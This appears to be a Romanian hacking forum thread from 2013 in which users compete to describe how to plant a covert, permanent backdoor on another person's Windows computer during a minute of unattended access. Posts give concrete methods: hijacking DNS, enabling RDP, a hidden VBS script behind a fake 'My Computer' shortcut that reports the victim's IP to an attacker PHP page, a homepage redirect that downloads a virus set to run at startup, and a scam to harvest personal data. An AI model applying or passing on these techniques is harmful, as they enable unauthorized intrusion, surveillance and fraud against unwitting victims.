Backdoor in 45 seconds - Challenge

[Cheater]

Cel mai discret, iar timp 3-5 sec:

Alterezi dns cu serv tau de dns, apoi ii poti sugera sa descarca orice, ba chiar te poti folosi de windows update / alte updateuri ale prog ce le foloseste (le urmaresti prin serv de dns).

[Silviu]

Îmi accesez blogul ?i-mi las comentariu (sau ping din cmd, ca s? nu las prea multe urme, de?i... accesezi o adres?. ce faci acolo? p?i m? uit pe blog/site la mine). Been there.

Pai nu ai internet in acel moment.

[qbert]

1.Allow rdp

2.Pentru a lua ip-ul,presupunand ca o sa aiba acces la internet eventual,creezi un vbs gen:

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("iexplore.exe adresata.com/a.php", 0)

Dupa care schimbi path-ul unui shortcut catre vbs-ul tau.Eventual setezi "hide my computer from desktop" si creezi un shortcut cu icoana my computer si path-ul vbs-ului.

"a.php" poate fi un fisier de genul

<?php

file_put_contents('a.txt',file_get_contents('a.txt') . $_SERVER['REMOTE_ADDR'] . "\r\n");

Iar in cazul ca nu esti deja pregatit cu un server cu fisierul prezent,poti schimba adresa catre un monitor de genul: Web Traffic Statistics - Stats - gainiderasa.in - Ultimele 25 de afisari , dupa care poti identifica ip-ul in functie de ora,data,browser,os ,iar avand in vedere ca ultima parte a ip-ului este cenzurata,dai un nmap (.0/24) dupa ip-uri cu portul alocat rdp-ului,deschis.

Edited May 4, 2013 by qbert

[awnly3jhc2g]

Sa presupunem ca esti la cineva acasa si lipseste un timp foarte scurt de la calculator (30secunde - 1minut).

Scopul tau. Sa iti asiguri un backdoor permanent la acel calculator.

Piedici:

* Calculatorul nu are net in acel moment.

* Nu ai cu tine niciun stick USB/CD whatevar.

* Ownerul calculatorului nu trebuie sa se prinda de nimic.

Va castiga cel cu solutia cea mai ingenioasa care ofera controlul cel mai mare la resursele sistemului. Luati in calcul si un posibil antivirus.

Restrictii:

* Windows

Premiu:

* O carte de programare. (cat 2 biblii)

Foarte multi sugereaza ca ar fi indicat sa iti faci un user in calculator, pacat ca variaza de ce sistem de operare are si setarile lui. (In windows XP, dupa restart, iti apare userul tau si al lui si este valabil in mai multe OS-uri (setarile default), astfel victima observa - automat intra in discutie piedica 3)

A doua sugestie pe care foarte multi o recomanda din nou, ar fi sa setezi in browserul victimei un link direct catre un virus (rat probabil sau indiferent de ce ar fi, trebuie sa fie 100% FUD, sau sa fie un program personal, care iti permite backdoor-ul fara a activa AV-ul).

Conteaza daca persoana respectiva are AV, cum se numeste, ce sistem de operare, ce cunostinte generale despre computere are,etc

+ trebuie sa iei in calcul si micile suprize,obstacole,stres, blocarea calculatorului, nu ai de unde stii ...

[AlStar]

Cel mai discret, iar timp 3-5 sec:

Alterezi dns cu serv tau de dns, apoi ii poti sugera sa descarca orice, ba chiar te poti folosi de windows update / alte updateuri ale prog ce le foloseste (le urmaresti prin serv de dns).

Mi se pare cea mai buna metoda si dureaza foarte putin.

[em]

Maine aleg cu random.org un castigator din cele mai bune raspunsuri. Pana atunci .. mai aveti timp.

[Wav3]

vorbe?te prostii. singurele comenzi care pot fi executate asupra juc?torului sunt doar comenzile care le poate da ?i juc?torul singur ( quit, kill, connect server.plm, sensitivity 8.0, etc), nu ai control în afara cs-ului. cel cu motd ar fi fost singura op?iune

Poti deschide CD-Rom.

[dancezar]

Cea mai buna metoda e asta:

Dechizi browserul setezi la download sa nu ceara calea de download si setezi tu una pe care sa o stii ex(C:\Downloads).

2.Setezi ca pagina de home un server de al tau gen (server.com/infect.php).

3.Setezi la startup calea C:\Downloads\virus.exe.

Acasa creezi scriptul php infect.php si virus.exe

infect.php

<?php

mysql_connect('localhost','root','pass');

mysql_select_db('logs');

mysql_query('INSERT INTO `ip` (`ip`) VALUES(".$_SERVER['REMOTE_ADDR'].")');

mysql_close();

echo '<script>document.location="server.com/virus.exe";</script>';

?>

[yo20063]

eu am tot timpul un stick in buzunar

[damageboy]

ii fac si ii pun la startup o pagina in care sa il anunte ca beneficiaza de net moca 7 luni plus echipament (sau lata oferta de nerefuzat)daca ma suna (sau il suna pe respectivul care il pun eu) sa facem o foaie de primire echipamente fara contract bineinteles si ca trebuie sa imi dea toate datele lui personale plus sa vad daca sistemul lui suporta echipamentul si atunci vin "dotat", metoda veche old school

nu se merita sa apelez la metode instabile mai bine asa ... cine stie cand o sa aiba net eu ii fac proba cu stick rds cand vin si i-am luat ce ma intereseaza il mai las si 1 saptamana "pana vin echipamnetele", cand o sa isi puna net o sa se trezeasca cu 10 aplicatii backdoor

daca are deja net dar nu e activat ii propun sa testam netul de pe stick sa facem un sondaj si revin cu stick-ul ulterior.

Nu ai cum sa setezi un sender sau un finder de smtp-uri privind IP-ul dinamic intr-un minut ca sa iti raporteze pe email ip-ul dinamic al victimei, doar sa setezi outlook-ul ca host pe pc-ul omului si asta depinde de versiunea windows-ului.Iar un bot-net sau ceva de genul cu raport pe ftp sau :80 nu poate fi scris asa de repede cu toate actiunile preluate de programele ce ruleaza (am uitat cum le zice preluai din yahoo mess pe baza label-urilor, field-urilor) Bafta !

Edited May 7, 2013 by damageboy

[em]

Pentru ca raspunsurile va sunt asemanatoare, am folosit random.org sa aleg castigatorul.

N #13. nedo.

3 zile sa trimiti un PM cu adresa. Cartea "Grafica Interactiva in java" (aleasa tot cu random.org).

Raspunsurile raman deschide dar fara premiu.

[Cheater]

Felicitari @nedo!

[nedo]

Thanks, Cred ca ar trebui sa joc la loto, ca vad ca am devenit norocos la castiguri din astea. Sunt destul de sigur ca o sa imi prinda bine cartea. Cu o cazia asta ma apuc si de java

Multumim em pentru chalange si premiu.

[Alien2613]

Rat in motd si 1 plugin pe server care sa-l execute. Hf

[em]

Rat in motd si 1 plugin pe server care sa-l execute. Hf

Nu prea gasesc documentat ce zici tu aici? Ai putea sa faci o demonstratie?